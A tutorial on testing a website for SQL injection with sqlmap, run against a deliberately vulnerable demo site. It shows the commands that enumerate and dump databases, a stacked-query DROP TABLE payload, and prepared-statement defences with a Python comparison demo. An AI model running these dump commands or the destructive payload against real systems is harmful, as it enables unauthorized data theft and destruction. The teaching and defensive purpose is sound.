
How to use SQLMAP to test a website for SQL Injection vulnerability

This article explains how to test whether a website is safe from SQL injection using the SQLMAP penetration testing tool. 

What is SQL Injection?

SQL Injection is a code injection technique in which an attacker supplies input that ends up being executed as part of a web application's SQL queries, and so gains control over its database. With the right set of queries, an attacker can read the information stored in the database or modify it. In this article, SQLMAP is used to test whether a 'GET' parameter is vulnerable to SQL Injection.

For example, consider the following PHP code segment:

$variable = $_POST['input'];
// Vulnerable: the raw POST value is interpolated straight into the query text
mysql_query("INSERT INTO `table` (`column`) VALUES ('$variable')");

If the user enters "value'); DROP TABLE table;--" as the input, the query becomes

INSERT INTO `table` (`column`) VALUES('value'); DROP TABLE table;--')

which is undesirable, because the user input is spliced directly into the pre-written SQL query and parsed together with it. The user can therefore supply whatever SQL is needed to manipulate the database. (PHP's legacy mysql_query() sends a single statement per call, so this particular stacked query would be rejected by MySQL with a syntax error rather than dropping the table; the user still controls the rest of the query text, and database APIs that accept several statements in one call would run the DROP.)

Where can you use SQLMAP?

If you observe a web URL of the form http://testphp.vulnweb.com/listproducts.php?cat=1, where cat=1 is the 'GET' parameter, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. SQLMAP works against PHP-based sites such as this one.

A simple test to check whether your website is vulnerable is to replace the value of the GET parameter with an asterisk (*). For example,

http://testphp.vulnweb.com/listproducts.php?cat=*

If this results in a database error on the page (the article originally showed a screenshot of such an error), then we can conclude that the website is vulnerable. Note that the converse does not hold: a page that shows no error may still be injectable (blind SQL injection), which is why the automated tests below are more reliable than this manual check.

Installing sqlmap

SQLMAP comes pre-installed with Kali Linux, which is the preferred choice of most penetration testers. However, you can install sqlmap on other Debian-based Linux systems using the command

sudo apt-get install sqlmap

Usage

In this article, we will make use of a website that is deliberately designed with vulnerabilities for demonstration purposes:

http://testphp.vulnweb.com/listproducts.php?cat=1

As you can see, there is a GET request parameter (cat=1) whose value can be changed by the user. So this website might be vulnerable to SQL injection of this kind.
To test for this, we use SQLMAP. To see the full set of options that can be passed, type in the terminal:

sqlmap -h

The options used for this basic SQL injection test are listed in that help output (the article originally showed them in a screenshot). Along with these, we will also use the -u and --dbs options, whose usage is shown in Step 1 below.

Using SQLMAP to test a website for SQL Injection vulnerability:

Step 1: Pass the target URL with -u and ask sqlmap to enumerate the databases with --dbs. sqlmap tests the cat parameter and, if it is injectable, lists the database names (acuart is the one used in the following steps).

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Step 2: List the tables of one database by naming it with -D and adding --tables.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Step 3: List the columns of a table by naming it with -T and adding --columns.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columns

Step 4: Dump the contents of a column by naming it with -C and adding --dump.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump

Prevent SQL Injection

SQL injection can generally be prevented by using prepared statements. With a prepared statement, the query is a template that the database parses first, and the user input is sent separately and bound to placeholders in that template; the input and the query text are never mixed. In the example given at the beginning of this article, the user input is inserted directly into the query text and the two are parsed together, which is what allows malicious SQL to execute. With a prepared statement, we send the SQL query with a placeholder for the user input and then send the actual user input as a separate step.
Consider the following PHP code segment.

$db = new PDO('connection details'); // DSN, user name and password go here
// The query template contains a named placeholder, :id, instead of user data
$stmt = $db->prepare("Select name from users where id = :id");
// The user input is bound to the placeholder and sent separately from the query text
$stmt->execute(array(':id' => $data));

In this code, the user input is not combined with the prepared statement; they are processed separately. So even if malicious SQL is entered as user input, the database treats it as a plain string value and not as part of the command.
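To make the contrast between the two PHP snippets concrete, here is an added Python example (not code from the article) that replays the stacked-query payload from the beginning of the article against an in-memory SQLite database in three ways: string interpolation through an API that runs several statements at once, string interpolation through a single-statement API, and a parameterized query equivalent to the PDO prepare()/execute() snippet above. The table name products, its initial row and the helper names are constructed for this example; the payload is the article's, with the table name adjusted to match.

```python
import sqlite3

# Constructed sample payload: the article's stacked-query input, with the table
# name changed from `table` to the constructed `products` table used below.
STACKED_PAYLOAD = "value'); DROP TABLE products;--"


def fresh_db():
    """Return an in-memory SQLite database with one constructed table, products(name)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.execute("INSERT INTO products (name) VALUES ('existing row')")
    conn.commit()
    return conn


def insert_vulnerable_multi(conn, user_input):
    """Vulnerable: user input is pasted into the SQL text, as in the article's
    first PHP snippet. executescript() runs every statement it is given, so the
    DROP TABLE smuggled in by the payload executes too."""
    sql = f"INSERT INTO products (name) VALUES ('{user_input}')"
    conn.executescript(sql)


def insert_vulnerable_single(conn, user_input):
    """Same string interpolation, but through execute(), which accepts one
    statement per call (the limit PHP's legacy mysql_query() also has).
    Returns True if the statement ran, False if the driver rejected it."""
    sql = f"INSERT INTO products (name) VALUES ('{user_input}')"
    try:
        conn.execute(sql)
        conn.commit()
        return True
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # Python's sqlite3 rejects "You can only execute one statement at a time."
        return False


def insert_prepared(conn, user_input):
    """Safe: a placeholder in the query template and the input bound separately,
    the SQLite equivalent of the article's PDO prepare()/execute() snippet."""
    conn.execute("INSERT INTO products (name) VALUES (?)", (user_input,))
    conn.commit()


def table_exists(conn):
    """True if the products table still exists."""
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'products'"
    ).fetchone()
    return row is not None


def product_names(conn):
    """All stored names, in insertion order."""
    return [r[0] for r in conn.execute("SELECT name FROM products ORDER BY rowid")]


def demo(payload=STACKED_PAYLOAD):
    """Run the payload through all three paths on separate databases and report
    whether the table survived and what was stored."""
    results = {}

    db = fresh_db()
    insert_vulnerable_multi(db, payload)
    results["multi_statement_table_survives"] = table_exists(db)

    db = fresh_db()
    results["single_statement_ran"] = insert_vulnerable_single(db, payload)
    results["single_statement_table_survives"] = table_exists(db)

    db = fresh_db()
    insert_prepared(db, payload)
    results["prepared_table_survives"] = table_exists(db)
    results["prepared_rows"] = product_names(db)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Run it and only the first path loses the table: the single-statement API refuses the stacked query outright, and the prepared statement stores the whole payload as an ordinary string value. A driver that accepts one statement per call is not a defence, since the caller still controls the rest of the query text; the placeholder is.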

Note: This application is to be used solely for testing purposes


Reference: stackoverflow.com
